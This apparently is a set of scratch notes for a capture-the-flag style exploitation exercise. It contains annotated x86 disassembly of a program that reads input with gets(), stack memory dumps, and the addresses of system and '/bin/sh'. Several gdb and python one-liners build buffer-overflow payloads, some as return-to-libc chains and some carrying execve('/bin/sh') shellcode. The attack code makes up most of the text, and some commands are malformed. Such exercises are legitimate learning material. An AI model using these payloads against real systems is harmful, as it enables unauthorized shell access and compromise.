ebp main : 0xBFFFF748
adresse de retour au main : 0x0804854a

main:
	0x0804853f <+0>:	push   %ebp
	0x08048540 <+1>:	mov    %esp,%ebp
	0x08048542 <+3>:	and    $0xfffffff0,%esp

	0x08048545 <+6>:	call   0x80484d4 <p>
	@0x0804854a <+11>:	leave
	0x0804854a <+11>:	mov    %ebp,%esp
	0x0804854a <+11>:	pop    %ebp
	0x0804854b <+12>:	ret

p:
	0x080484d4 <+0>:	push   %ebp
	0x080484d5 <+1>:	mov    %esp,%ebp

	0x080484d7 <+3>:	sub    $0x68,%esp ; 104

	0x080484da <+6>:	mov    0x8049860,%eax ; stdout
	0x080484df <+11>:	mov    %eax,(%esp)
	0x080484e2 <+14>:	call   0x80483b0 <fflush@plt> ; fflush(stdout)

	0x080484e7 <+19>:	lea    -0x4c(%ebp),%eax ; 76
	0x080484ea <+22>:	mov    %eax,(%esp)
	0x080484ed <+25>:	call   0x80483c0 <gets@plt>

	0x080484f2 <+30>:	mov    0x4(%ebp),%eax ; adresse de retour du main
	0x080484f5 <+33>:	mov    %eax,-0xc(%ebp) ; 12
	0x080484f8 <+36>:	mov    -0xc(%ebp),%eax
	0x080484fb <+39>:	and    $0xb0000000,%eax
	0x08048500 <+44>:	cmp    $0xb0000000,%eax
	0x08048505 <+49>:	jne    0x8048527 <p+83>

{
	0x08048507 <+51>:	mov    $0x8048620,%eax
	0x0804850c <+56>:	mov    -0xc(%ebp),%edx
	0x0804850f <+59>:	mov    %edx,0x4(%esp)
	0x08048513 <+63>:	mov    %eax,(%esp)
	0x08048516 <+66>:	call   0x80483a0 <printf@plt>

	0x0804851b <+71>:	movl   $0x1,(%esp)
	0x08048522 <+78>:	call   0x80483d0 <_exit@plt>
}

	0x08048527 <+83>:	lea    -0x4c(%ebp),%eax
	0x0804852a <+86>:	mov    %eax,(%esp)
	0x0804852d <+89>:	call   0x80483f0 <puts@plt>
	0x08048532 <+94>:	lea    -0x4c(%ebp),%eax
	0x08048535 <+97>:	mov    %eax,(%esp)
	0x08048538 <+100>:	call   0x80483e0 <strdup@plt>
	@0x0804853d <+105>:	leave
	0x0804853d <+105>:	mov    %ebp,%esp
	0x0804853d <+105>:	pop    %ebp
	0x0804853e <+106>:	ret

	0x61616161	0x61616161	0x61616161	0x61616161
	0x61616161	0x61616161	0x61616161	0x61616161
	0x61616161	0x61616161	0x61616161	0x61616161
	0x61616161  0x61616161	0x61616161	0x61616161

system address:  0xb7e6b060
/bin/sh : 0xbfffff27

ebp main : 0xBFFFF738
adresse de retour au main : 0x0804854a
                                                          "    BUFFER    ""       EBP main         ""      EIP de retour func p ""  Stack main + ebp main"" "" addr de system"" ""retour de system""  ""/bin/sh"""

gdb /home/user/level2/level2 -ex "set args < <(python -c \"print 'a' * 76 + '\x58''\xfd''\xff''\xbf' + '\x4a''\x85''\x04''\x08' + '\x00' * 12 + '\x60''\xb0''\xe6''\xb7' + '\x4b''\x85''\x04''\x08' + '\x27''\xff''\xff''\xbf'\")"

gdb /home/user/level2/level2 -ex "set args < <(python -c \"print '\x31''\xc0''\x50''\x68''\x2f''\x2f''\x73''\x68''\x68''\x2f''\x62''\x69''\x6e''\x89''\xe3''\x50''\x53''\x89''\xe1''\xb0''\x0b''\xcd''\x80' + 'a' * 53 + '\x38''\xf7''\xff''\xbf' + '\x4a''\x85''\x04''\x08' + '\x00' * 12 + '\x60''\xb0''\xe6''\xb7' + '\x4b''\x85''\x04''\x08' + '\x27''\xff''\xff''\xbf'\")"


gdb /home/user/level2/level2 -ex "set args < <(python -c \"print '\x31''\xc0''\x50''\x68''\x2f''\x2f''\x73''\x68''\x68''\x2f''\x62''\x69''\x6e''\x89''\xe3''\x50''\x53''\x89''\xe1''\xb0''\x0b''\xcd''\x80' + 'a' * 53 + '\x38''\xf7''\xff''\xbf' + '\x4a''\x85''\x04''\x08' + '\x00' * 12 + '\xdc''\xf6''\xff''\xbf'\")"

env -i BINSH=/bin/sh /usr/bin/gdb /home/user/level2/level2 -ex "set args < <(python -c \"print '\x31''\xc0''\x50''\x68''\x2f''\x2f''\x73''\x68''\x68''\x2f''\x62''\x69''\x6e''\x89''\xe3''\x50''\x53''\x89''\xe1''\xb0''\x0b''\xcd''\x80' + 'a' * 53 + '\x18''\xfd''\xff''\xbf' +  '\x3e\x85\x04\x08' + '\x2c''\xfc''\xff''\xbf'\")"

gdb /home/user/level2/level2 -ex "set args < <(python -c \"print 'a' * 76 + '\x38''\xf7''\xff''\xbf' + '\x4a''\x85''\x04''\x08' + '\x00' * 12 + '\x6d''\x72''\xfe''\xbf'\")"

gdb /home/user/level2/level2 -ex "set args < <(python -c \"print 'a' * 76 + '\x18''\xfd''\xff''\xbf' +  '\x3e\x85\x04\x08' + '\xff''\xff''\xfe''\xbf'\")"

gdb /home/user/level2/level2 -ex "set args < <(python -c \"print 'a' * 76 + '\x18''\xfd''\xff''\xbf' +  '\x3e\x85\x04\x08' + '\x27''\xfa''\xff''\xbf'\")"


0xbffe726d

0xbffff648:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff650:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff658:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff660:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff668:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff670:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff678:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff680:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff688:	0x00	0x01	0x00	0x00	0xf4	0x0f	0xfd	0xb7
0xbffff690:	0xdc	0xf6	0xff	0xbf	0x55	0x00	0x00	0x00
0xbffff698:	0x55	0x00	0x00	0x00	0x79	0x8d	0xea	0xb7
0xbffff6a0:	0x08	0xa0	0x04	0x08	0xdc	0xf6	0xff	0xbf
0xbffff6a8:	0x55	0x00	0x00	0x00	0x30	0x8d	0xea	0xb7
0xbffff6b0:	0xf4	0x0f	0xfd	0xb7	0x00	0x00	0x00	0x00
0xbffff6b8:	0x00	0x00	0x00	0x00	0x3d	0x85	0x04	0x08
0xbffff6c0:	0xdc	0xf6	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffff6c8:	0x00	0x00	0x00	0x00	0x73	0xec	0xe5	0xb7
0xbffff6d0:	0xb5	0x82	0x04	0x08	0x00	0x00	0x00	0x00
0xbffff6d8:	0x00	0x00	0xca	0x00	0x61	0x61	0x61	0x61
0xbffff6e0:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffff6e8:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffff6f0:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffff6f8:	0x61	0x61	0x61	0x61	0x70	0xaf	0xe6	0xb7
0xbffff700:	0x70	0xaf	0xe6	0xb7	0x24	0xf7	0xff	0xbf
0xbffff708:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffff710:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffff718:	0x61	0x61	0x61	0x61	0x00	0x00	0x00	0x00
0xbffff720:	0x00	0x7f	0x00	0x00	0xad	0x1d	0x00	0x00
0xbffff728:	0x38	0xf7	0xff	0xbf	0x4a	0x85	0x04	0x08
0xbffff730:	0xf4	0x0f	0xfd	0xb7	0xf4	0x0f	0xfd	0xb7
0xbffff738:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff740:	0x40	0xf7	0xff	0xbf	0x32	0xff	0xff	0xbf
0xbffff748:	0x00	0xf7	0xff	0xbf	0x58	0xc8	0xfd	0xb7
0xbffff750:	0x00	0x00	0x00	0x00	0x1c	0xf7	0xff	0xbf
0xbffff758:	0xdc	0xf7	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffff760:	0x60	0x82	0x04	0x08	0xf4	0x0f	0xfd	0xb7
0xbffff768:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff770:	0x00	0x00	0x00	0x00	0x6f	0x95	0x34	0x1a
0xbffff778:	0x7f	0x31	0x73	0x2d	0x00	0x00	0x00	0x00
0xbffff780:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff788:	0x01	0x00	0x00	0x00	0x20	0x84	0x04	0x08
0xbffff790:	0x00	0x00	0x00	0x00	0xb0	0x26	0xff	0xb7
0xbffff798:	0xe9	0x53	0xe4	0xb7	0xf4	0xef	0xff	0xb7
0xbffff7a0:	0x01	0x00	0x00	0x00	0x20	0x84	0x04	0x08
0xbffff7a8:	0x00	0x00	0x00	0x00	0x41	0x84	0x04	0x08
0xbffff7b0:	0x3f	0x85	0x04	0x08	0x01	0x00	0x00	0x00
0xbffff7b8:	0xd4	0xf7	0xff	0xbf	0x50	0x85	0x04	0x08
0xbffff7c0:	0xc0	0x85	0x04	0x08	0x80	0xd2	0xfe	0xb7
0xbffff7c8:	0xcc	0xf7	0xff	0xbf	0x18	0xf9	0xff	0xb7
0xbffff7d0:	0x01	0x00	0x00	0x00	0xf7	0xf8	0xff	0xbf

gdb /home/user/level2/level2 -ex "set args < <(python -c \"print 'a' * 76\")" + 'b' * 4 + '\x4a''\x85''\x04''\x08'\")"
 + 'b' * 12 + '\x60''\xb0''\xe6''\xb7' + '\x00' * 4 + '\x32''\xff''\xff''\xbf'\")"
